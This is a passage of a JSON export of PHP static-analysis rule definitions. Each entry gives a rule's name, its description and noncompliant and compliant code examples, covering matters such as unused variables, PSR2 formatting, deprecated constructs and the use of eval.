word.","defaultValue":"^(\/\/|#)\\s*+[^\\s]++$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1479","repo":"php","name":"\"switch\" statements should not have too many \"case\" clauses","htmlDesc":"<p>When <code>switch<\/code> statements have large sets of <code>case<\/code> clauses, it is usually an attempt to map two sets of data. A real map\nstructure would be more readable and maintainable, and should be used instead.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of case","defaultValue":"30","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1481","repo":"php","name":"Unused local variables should be removed","htmlDesc":"<p>If a local variable is declared but not used, it is dead code and should be removed. Doing so will improve maintainability because developers will\nnot wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction numberOfMinutes($hours) {\n $seconds = 0; \/\/ seconds is never used\n return hours * 60;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction numberOfMinutes($hours) {\n return hours * 60;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1488","repo":"php","name":"Local Variables should not be declared and then immediately returned or thrown","htmlDesc":"<p>Declaring a variable only to immediately return or throw it is a bad practice.<\/p>\n<p>Some developers argue that the practice improves code readability, because it enables them to explicitly name what is being returned. However, this\nvariable is an internal implementation detail that is not exposed to the callers of the method. The method name should be sufficient for callers to\nknow exactly what will be returned.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction compute_duration_in_milliseconds() {\n $duration = ((($hours * 60) + $minutes) * 60 + $seconds ) * 1000 ;\n return $duration;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction compute_duration_in_milliseconds() {\n return ((($hours * 60) + $minutes) * 60 + $seconds ) * 1000;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1523","repo":"php","name":"Code should not be dynamically injected and executed","htmlDesc":"<p>The <code>eval<\/code> function is a way to run arbitrary code at run-time. <\/p>\n<p>According to the PHP documentation<\/p>\n<blockquote>\n <p>The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have\n carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it\n without properly validating it beforehand.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\neval($code_to_be_dynamically_executed)\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/95.html\">MITRE CWE-95<\/a> - CWE-95: Improper Neutralization of Directives in Dynamically\n Evaluated Code ('Eval Injection') <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S1536","repo":"php","name":"Function argument names should be unique","htmlDesc":"<p>Function arguments should all have different names to prevent any ambiguity. Indeed, if arguments have the same name, the last duplicated argument\nhides all the previous arguments with the same name. This hiding makes no sense, reduces understandability and maintainability, and obviously can be\nerror prone. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction compute($a, $a, $c) { \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction compute($a, $b, $c) { \/\/ Compliant\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1599","repo":"php","name":"Variable variables should not be used","htmlDesc":"<p>PHP's \"variable variables\" feature (dynamically-named variables) is temptingly powerful, but can lead to unmaintainable code. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$var = 'foo';\n$$var = 'bar'; \/\/Noncompliant\n$$$var = 'hello'; \/\/Noncompliant\n\necho $foo; \/\/will display 'bar'\necho $bar; \/\/will display 'hello'\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1600","repo":"php","name":"Deprecated predefined variables should not be used","htmlDesc":"<p>The following predefined variables are deprecated and should be replaced by the new versions:<\/p>\n<table>\n <tbody>\n <tr>\n <th>Replace<\/th>\n <th>With<\/th>\n <\/tr>\n <tr>\n <td>$HTTP_SERVER_VARS<\/td>\n <td>$_SERVER<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_GET_VARS<\/td>\n <td>$_GET<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_POST_VARS<\/td>\n <td>$_POST<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_POST_FILES<\/td>\n <td>$_FILES<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_SESSION_VARS<\/td>\n <td>$_SESSION<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_ENV_VARS<\/td>\n <td>$_ENV<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_COOKIE_VARS<\/td>\n <\/tr>\n <\/tbody>\n<\/table>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\necho 'Name parameter value: ' . $HTTP_GET_VARS[\"name\"];\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\necho 'Name parameter value: ' . $_GET[\"name\"];\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1603","repo":"php","name":"PHP 4 constructor declarations should not be used","htmlDesc":"<p>In PHP 4, any function with the same name as the nesting class was considered a class constructor. In PHP 5, this mechanism has been deprecated and\nthe \"__construct\" method name should be used instead. If both styles are present in the same class, PHP 5 will treat the function named \"__construct\"\nas the class constructor. <\/p>\n<p>This rule rule raises an issue for each method with the same name as the enclosing class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n function Foo(){...}\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo {\n function __construct(){...}\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1605","repo":"php","name":"\"__construct\" functions should not make PHP 4-style calls to parent constructors","htmlDesc":"<p>In PHP 5 both the way to declare a constructor and the way to make a call to a parent constructor have evolved. When declaring constructors with\nthe PHP5 <code>__construct<\/code> name, nested calls to parent constructors should also use the new <code>__constructor<\/code> name.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo extends Bar {\n function __construct() {\n parent::Bar();\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo extends Bar {\n function __construct() {\n parent::__construct();\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1656","repo":"php","name":"Variables should not be self-assigned","htmlDesc":"<p>There is no reason to re-assign a variable to itself. Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic function setName($name) {\n $name = $name;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function setName($name) {\n $this->name = $name;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1757","repo":"php","name":"\"<?php\" and \"<?=\" tags should be used","htmlDesc":"<p>Coding conventions allow teams to collaborate effectively. For maximum standardization and readability, PHP code should use the long <code><?php\n?><\/code> tags or the short-echo <code><?= ?><\/code> tags; it should not use the other tag variations.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?\n$foo = 1;\n?>\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\n$foo = 1;\n?>\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1763","repo":"php","name":"Jump statements should not be followed by other statements","htmlDesc":"<p>Jump statements (<code>return<\/code>, <code>break<\/code>, <code>continue<\/code>, and <code>goto<\/code>) and <code>throw<\/code> expressions move\ncontrol flow out of the current code block. Typically, any statements in a block that come after a jump or <code>throw<\/code> are simply wasted\nkeystrokes lying in wait to confuse the unwary. <\/p>\n<p>Rarely, as illustrated below, code after a jump or <code>throw<\/code> is reachable. However, such code is difficult to understand, and should be\nrefactored. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction fun($a) {\n $i = 10;\n return $i + $a;\n $i++; \/\/ this is never executed\n}\n\nfunction foo($a) {\n if ($a == 5) {\n goto error;\n } else {\n \/\/ do the job\n }\n return;\n\n error:\n printf(\"don't use 5\"); \/\/ this is reachable but unreadable\n\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction fun($a) {\n $i = 10;\n return $i + $a;\n}\n\nfunction foo($a) {\n if ($a == 5) {\n handleError();\n } else {\n \/\/ do the job\n }\n return;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C++:2008, 0-1-9 - There shall be no dead code <\/li>\n <li> MISRA C:2012, 2.2 - There shall be no dead code <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/561.html\">MITRE, CWE-561<\/a> - Dead Code <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1764","repo":"php","name":"Identical expressions should not be used on both sides of a binary operator","htmlDesc":"<p>Using the same value on either side of a binary operator is almost always a mistake. In the case of logical operators, it is either a copy\/paste\nerror and therefore a bug, or it is simply wasted code, and should be simplified. In the case of bitwise operators and most binary mathematical\noperators, having the same value on both sides of an operator yields predictable results, and should be simplified.<\/p>\n<p>This rule ignores <code>*<\/code>, <code>+<\/code>, and <code>=<\/code>. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ( $a == $a ) { \/\/ always true\n doZ();\n}\nif ( $a != $a ) { \/\/ always false\n doY();\n}\nif ( $a == $b && $a == $b ) { \/\/ if the first one is true, the second one is too\n doX();\n}\nif ( $a == $b || $a == $b ) { \/\/ if the first one is true, the second one is too\n doW();\n}\n\n$j = 5 \/ 5; \/\/always 1\n$k = 5 - 5; \/\/always 0\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Left-shifting 1 onto 1 is common in the construction of bit masks, and is ignored.<\/p>\n<pre>\n$i = 1 << 1; \/\/ Compliant\n$j = $a << $a; \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n <li> <a href='\/coding_rules#rule_key=php%3AS1656'>S1656<\/a> - Implements a check on <code>=<\/code>. <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1765","repo":"php","name":"The \"var\" keyword should not be used","htmlDesc":"<p>The PHP 4 method of declaring a variable, using the <code>var<\/code> keyword, was deprecated in early versions of PHP 5. Even though it's not\nconsidered deprecated in the most recent versions, it's nonetheless not best practice to use it. When <code>var<\/code> does appear, it is interpreted\nas a synonym for <code>public<\/code> and treated as such. Therefore <code>public<\/code> should be used instead.<\/p>\n<p>From the PHP Manual:<\/p>\n<blockquote>\n <p>The PHP 4 method of declaring a variable with the var keyword is still supported for compatibility reasons (as a synonym for the public keyword).\n In PHP 5 before 5.1.3, its usage would generate an E_STRICT warning.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\nclass Foo\n{\n var $bar = 1;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\nclass Foo\n{\n public $bar = 1;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1766","repo":"php","name":"More than one property should not be declared per statement","htmlDesc":"<p>For better readability, do not put multiple property declarations in the same statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\nclass Foo\n{\n private $bar = 1, $bar2 = 2;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\nclass Foo\n{\n private $bar1 = 1;\n private $bar2 = 2;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1779","repo":"php","name":"Only LF character (Unix-like) should be used to end lines","htmlDesc":"<p>All developers should use the same end-line character(s) to prevent polluting the history changelog of source files in the SCM engine. Moreover\nsome SCM engines like Git might sometimes badly support use of Windows 'CRLF' end of line characters.<\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1780","repo":"php","name":"Closing tag \"?>\" should be omitted on files containing only PHP","htmlDesc":"<p>According to the PSR2 coding standard:<\/p>\n<blockquote>\n <p>The closing <code>?><\/code> tag should be omitted from files containing only PHP.<\/p>\n<\/blockquote>\n<p>According to the PHP manual:<\/p>\n<blockquote>\n <p>in some cases omitting it is helpful when using include or require, so unwanted whitespace will not occur at the end of files, and you will still\n be able to add headers to the response later. It is also handy if you use output buffering, and would not like to see added unwanted whitespace at\n the end of the parts generated by the included files.<\/p>\n<\/blockquote>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1781","repo":"php","name":"PHP keywords and constants \"true\", \"false\", \"null\" should be lower case","htmlDesc":"<p>Using indifferently lower or upper case for PHP keywords and constants \"true\", \"false\" and \"null\" can impact the readability of PHP source\ncode.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php ECHO 'Hello World'; ?>\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php echo 'Hello World'; ?>\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1784","repo":"php","name":"Method visibility should be explicitly declared","htmlDesc":"<p>Class methods may be defined as public, private, or protected. Methods declared without any explicit visibility keyword are defined as public. To\nprevent any misunderstanding, this visibility should always be explicitly declared.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function foo(){...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1788","repo":"php","name":"Method arguments with default values should be last","htmlDesc":"<p>The ability to define default values for method arguments can make a method easier to use. Default argument values allow callers to specify as many\nor as few arguments as they want while getting the same functionality and minimizing boilerplate, wrapper code. <\/p>\n<p>But all method arguments with default values should be declared after the method arguments without default values. Otherwise, it makes it\nimpossible for callers to take advantage of defaults; they must re-specify the defaulted values in order to \"get to\" the non-default arguments.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction makeyogurt($type = \"acidophilus\", $flavor){...} \/\/ Noncompliant\n\nmakeyogurt(\"raspberry\")}} \/\/ Runtime error: Missing argument 2 in call to makeyogurt()\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction makeyogurt($flavor, $type = \"acidophilus\", ){...}\n\nmakeyogurt(\"raspberry\")}} \/\/ Works as expected\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1793","repo":"php","name":"\"elseif\" keyword should be used in place of \"else if\" keywords","htmlDesc":"<p>According to the PSR2 coding standard:<\/p>\n<blockquote>\n <p>The keyword <code>elseif<\/code> SHOULD be used instead of <code>else if<\/code> so that all control keywords look like single words.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($expr1) {\n ...\n} else if ($expr2) {\n ...\n} else {...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($expr1) {\n ...\n} elseif ($expr2) {\n ...\n} else {...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1799","repo":"php","name":"\"exit(...)\" and \"die(...)\" statements should not be used","htmlDesc":"<p>The <code>exit(...)<\/code> and <code>die(...)<\/code> statements should absolutely not be used in Web PHP pages as this might lead to a very bad\nuser experience. In such case, the end user might have the feeling that the web site is down or has encountered a fatal error. <\/p>\n<p>But of course PHP can also be used to develop command line application and in such case use of <code>exit(...)<\/code> or <code>die(...)<\/code>\nstatement can be justified but must remain limited and not spread all over the application. We expect exceptions to be used to handle errors and those\nexceptions should be caught just before leaving the application to specify the exit code with help of <code>exit(...)<\/code> or <code>die(...)<\/code>\nstatements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n public function bar($param) {\n if ($param === 42) {\n exit(23);\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo {\n public function bar($param) {\n if ($param === 42) {\n throw new Exception('Value 42 is not expected.');\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1808","repo":"php","name":"Source code should comply with formatting standards","htmlDesc":"<p>Shared coding conventions make it possible for a team to collaborate efficiently. This rule raises issues for failures to comply with formatting\nstandard. The default parameter values conform to the PSR2 standard.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default PSR2 parameter values:<\/p>\n<pre>\nuse FooClass;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \/\/ Noncompliant; the \"use\" declaration should be placed after the \"namespace\" declaration\n\nnamespace Vendor\\Package;\nuse FooClass;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \/\/ Noncompliant; the \"namespace\" declaration should be followed by a blank line\n$foo = 1;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \/\/ Noncompliant; the \"use\" declaration should be followed by a blank line\n\nclass ClassA {\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \u2002 \u2002\/\/ Noncompliant; an open curly brace should be at the beginning of a new line for classes and functions\n\u2002\u2002function my_function(){ \u2002\/\/ Noncompliant; curly brace on wrong line\n\u2002\u2002\u2002\u2002if ($firstThing)\u2002\u2002\u2002\u2002\u2002\u2002\u2002\/\/ Noncompliant; an open curly brace should be at the end of line for a control structure\n\u2002\u2002\u2002\u2002{\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n\u2002\u2002\u2002\u2002if ($secondThing)\u2002 {\u2002\/\/ Noncompliant; there should be exactly one space between the closing parenthesis and the opening curly brace\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n if($thirdThing) { \/\/ Noncompliant; there should be exactly one space between the control structure keyword and the opening parenthesis\n ...\n }\n else { \/\/ Noncompliant; the close curly brace and the next \"else\" (or \"catch\" or \"finally\") keyword should be located on the same line\n ...\n }\n\n try{ \/\/ Noncompliant; there should be exactly one space between the control structure keyword and the curly brace\n ...\n } catch (Exception $e) {\n\u2002\u2002 }\n\n analyse( $fruit ) ; \/\/ Noncompliant; there should not be any space after the opening parenthesis and before the closing parenthesis\n\n for ($i = 0;$i < 10; $i++) { \/\/ Nomcompliant; there should be exactly one space after each \";\" in the {{for}} statement\n ...\n }\n\n pressJuice($apply ,$orange); \/\/ Noncompliant; the comma should be followed by one space and not preceded by any\n\n do_something (); \/\/ Noncompliant; there should not be any space after the method name\n\n foreach ($fruits as $fruit_key => $fruit) { \/\/ Noncompliant; in the foreach statement there should be one space before and after \"as\" keyword and \"=>\" operator\n ...\n }\n }\n}\n\nclass ClassB\nextends ParentClass \/\/ Noncompliant; the class name and the \"extends\" \/ \"implements\" keyword should be on the same line\n{\n ...\n}\n\nclass ClassC extends ParentClass implements \\ArrayAccess, \\Countable,\n \\Serializable \/\/ Noncompliant; the list of implemented interfaces should be correctly indented\n{\n\n public function aVeryLongMethodName(ClassTypeHint $arg1, \/\/ Noncompliant; the arguments in a method declaration should be correctly indented\n &$arg2, array $arg3 = []) {\n\n $noArgs_longVars = function () use ($longVar1, \/\/ Noncompliant; the arguments in a function declaration should be correctly indented\n $longerVar2,\n $muchLongerVar3\n ) {\n ...\n };\n\n $foo->bar($longArgument, \/\/ Noncompliant; the arguments in a method call should be correctly indented\n $longerArgument,\n $muchLongerArgument); \/\/ Noncompliant; the closing parenthesis should be placed on the next line\n\n $closureWithArgsAndVars = function($arg1, $arg2)use ($var1, $var2) { \/\/ Noncompliant; the closure declaration should be correctly spaced - see (5)\n ...\n };\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nnamespace Vendor\\Package; \/\/ Compliant; the \"namespace\" declaration is followed by a blank line\n\nuse FooClass; \/\/ Compliant; the \"use\" declaration is placed after the \"namespace\" declaration\n \/\/ Compliant; the \"use\" declaration is followed by a blank line\n$foo = 1;\n\nclass ClassA\n{\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \u2002\/\/ Compliant; the open curly brace is at the beginning of a new line for the class\n\u2002\u2002function my_function()\n {\u2002\u2002\u2002\u2002 \/\/ Compliant; the open curly brace is at the beginning of a new line for the function\n\u2002\u2002\u2002\u2002if ($firstThing)\u2002{\u2002\u2002\u2002\u2002\/\/ Compliant; the open curly brace is at the end of line for the control structure\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n\u2002\u2002\u2002\u2002if ($secondThing)\u2002{\u2002\u2002 \/\/ Compliant; there is exactly one space between the closing parenthesis and the opening curly brace\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n if ($thirdThing) { \/\/ Compliant; there is exactly one space between the control structure keyword and the opening parenthesis\n ...\n } else { \/\/ Compliant; the close curly brace and the next \"else\" (or \"catch\" or \"finally\") keyword are located on the same line\n ...\n }\n\n try { \/\/ Compliant; there is exactly one space between the control structure keyword and the curly brace\n ...\n } catch (Exception $e) {\n ...\n }\n\n analyse($fruit); \/\/ Compliant: there is no space after the opening parenthesis, nor before the closing parenthesis\n\n for ($i = 0; $i < 10; $i++) { \/\/ Compliant: there is exactly one space after each \";\" in the {{for}} statement\n ...\n }\n\n pressJuice($apply, $orange); \/\/ Compliant; the comma is followed by one space and is not preceded by any\n\n do_something(); \/\/ Compliant; there is no space after the method name\n\n foreach ($fruits as $fruit_key => $fruit) { \/\/ Compliant; in the foreach statement there is one space before and after \"as\" keyword and \"=>\" operator\n ...\n }\n }\n}\n\n\/* The idea here is to make it obvious at first glance that a class extends\n * some other classes and\/or implements some interfaces. The names of\n * extended classes or implemented interfaces can be located on subsequent lines.\n *\/\nclass ClassB1 extends ParentClass \/\/ Compliant; the class name and the \"extends\" (or \"implements\") keyword are located on the same line\n{\n ...\n}\n\nclass ClassB2 extends \/\/ Compliant; the class name and the \"extends\" (or \"implements\") keyword are located on the same line\nParentClass {\n ...\n}\n\n\/* Lists of implements may be split across multiple lines, where each subsequent line\n * is indented once. When doing so, the first item in the list should be on the next line,\n * and there should be only one interface per line.\n *\/\nclass ClassC extends ParentClass implements\n \\ArrayAccess, \/\/ Compliant; the list of implemented interfaces is correctly indented\n \\Countable,\n \\Serializable\n{\n \/* Argument lists may be split across multiple lines, where each subsequent line\n * is indented once. When doing so, the first item in the list should be on the next line,\n * and there should be only one argument per line. Also, when the argument list is\n * split across multiple lines, the closing parenthesis and opening brace should be\n * placed together on their own line with one space between them.\n *\/\n public function aVeryLongMethodName(\n ClassTypeHint $arg1, \/\/ Compliant; the arguments in a method\/function declaration are correctly indented\n &$arg2,\n array $arg3 = []\n ) {\n $noArgs_longVars = function () use (\n $longVar1, \/\/ Compliant; the arguments in a method\/function declaration are correctly indented\n $longerVar2,\n $muchLongerVar3\n ) {\n ...\n };\n\n\n \/* Argument lists may be split across multiple lines, where each subsequent line is\n * indented once. When doing so, the first item in the list should be on the next line,\n * and there should be only one argument per line.\n *\/\n $foo->bar(\n $longArgument, \/\/ Compliant; the arguments in the method call are be correctly indented\n $longerArgument,\n $muchLongerArgument\n ); \/\/ Compliant; the closing parenthesis is placed on a separate line\n\n \/* Closures should be declared with a space after the \"function\" keyword,\n * and a space before and after the \"use\" keyword.\n *\/\n $closureWithArgsAndVars = function ($arg1, $arg2) use ($var1, $var2) { \/\/ Compliant; the closure declaration is correctly spaced\n ...\n };\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[{"key":"extends_implements_line","htmlDesc":"Class names, "extends" and "implements" keywords should be located on the same line","defaultValue":"true","type":"BOOLEAN"},{"key":"no_space_method_name","htmlDesc":"There should not be any space after a method name","defaultValue":"true","type":"BOOLEAN"},{"key":"closure_format","htmlDesc":"Closures declaration should be correctly spaced","defaultValue":"true","type":"BOOLEAN"},{"key":"space_comma","htmlDesc":"Commas should be followed by one space and not preceded by any","defaultValue":"true","type":"BOOLEAN"},{"key":"open_curly_brace_classes_functions","htmlDesc":"Open curly braces should be at the beginning of a new line for classes and functions","defaultValue":"true","type":"BOOLEAN"},{"key":"namespace_blank_line","htmlDesc":""namespace" declarations should be followed by a blank line","defaultValue":"true","type":"BOOLEAN"},{"key":"open_curly_brace_control_structures","htmlDesc":"Open curly braces should be at the end of line for control structures","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_after","htmlDesc":"There should be exactly one space between closing parenthesis and opening curly braces","defaultValue":"true","type":"BOOLEAN"},{"key":"interfaces_indentation","htmlDesc":"List of implemented interfaces should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"foreach_space","htmlDesc":"In foreach statement there should be one space before and after "as" keyword and "=>" operator","defaultValue":"true","type":"BOOLEAN"},{"key":"no_space","htmlDesc":"There should not be any space after the opening parenthesis and before the closing parenthesis","defaultValue":"true","type":"BOOLEAN"},{"key":"function_calls_arguments_indentation","htmlDesc":"Arguments in method\/function calls should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"closing_curly_brace","htmlDesc":"Close curly brace and the next "else", "catch" and "finally" keywords should be located on the same line","defaultValue":"true","type":"BOOLEAN"},{"key":"function_declaration_arguments_indentation","htmlDesc":"Arguments in method\/function declarations should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"use_blank_line","htmlDesc":""use" declarations should be followed by a blank line","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_for","htmlDesc":"There should be one space after each ";" in "for" statement","defaultValue":"true","type":"BOOLEAN"},{"key":"use_after_namespace","htmlDesc":""use" declarations should be placed after "namespace" declarations","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_before","htmlDesc":"There should be exactly one space between control structure keyword and opening parenthesis or curly brace","defaultValue":"true","type":"BOOLEAN"}],"type":"CODE_SMELL"},{"key":"php:S1848","repo":"php","name":"Objects should not be created to be dropped immediately without being used","htmlDesc":"<p>There is no good reason to create a new object to not do anything with it. Most of the time, this is due to a missing piece of code and so could\nlead to an unexpected behavior in production.<\/p>\n<p>If it was done on purpose because the constructor has side-effects, then that side-effect code should be moved into a separate, static method and\ncalled directly.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($x < 0) {\n new foo; \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$var = NULL;\nif ($x < 0) {\n $var = new foo;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1862","repo":"php","name":"Related \"if\/else if\" statements and \"cases\" in a \"switch\" should not have the same condition","htmlDesc":"<p>A <code>switch<\/code> and a chain of <code>if<\/code>\/<code>else if<\/code> statements is evaluated from top to bottom. At most, only one branch will\nbe executed: the first one with a condition that evaluates to <code>true<\/code>.<\/p>\n<p>Therefore, duplicating a condition automatically leads to dead code. Usually, this is due to a copy\/paste error. At best, it's simply dead code and\nat worst, it's a bug that is likely to induce further bugs as the code is maintained, and obviously it could lead to unexpected behavior.<\/p>\n<p>For a <code>switch<\/code>, if the first case ends with a <code>break<\/code>, the second case will never be executed, rendering it dead code. Worse\nthere is the risk in this situation that future maintenance will be done on the dead case, rather than on the one that's actually used.<\/p>\n<p>On the other hand, if the first case does not end with a <code>break<\/code>, both cases will be executed, but future maintainers may not notice\nthat.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($param == 1)\n openWindow();\nelse if ($param == 2)\n closeWindow();\nelse if ($param == 1) \/\/ Noncompliant\n moveWindowToTheBackground();\n\n\nswitch($i) {\n case 1:\n \/\/...\n break;\n case 3:\n \/\/...\n break;\n case 1: \/\/ Noncompliant\n \/\/...\n break;\n default:\n \/\/ ...\n 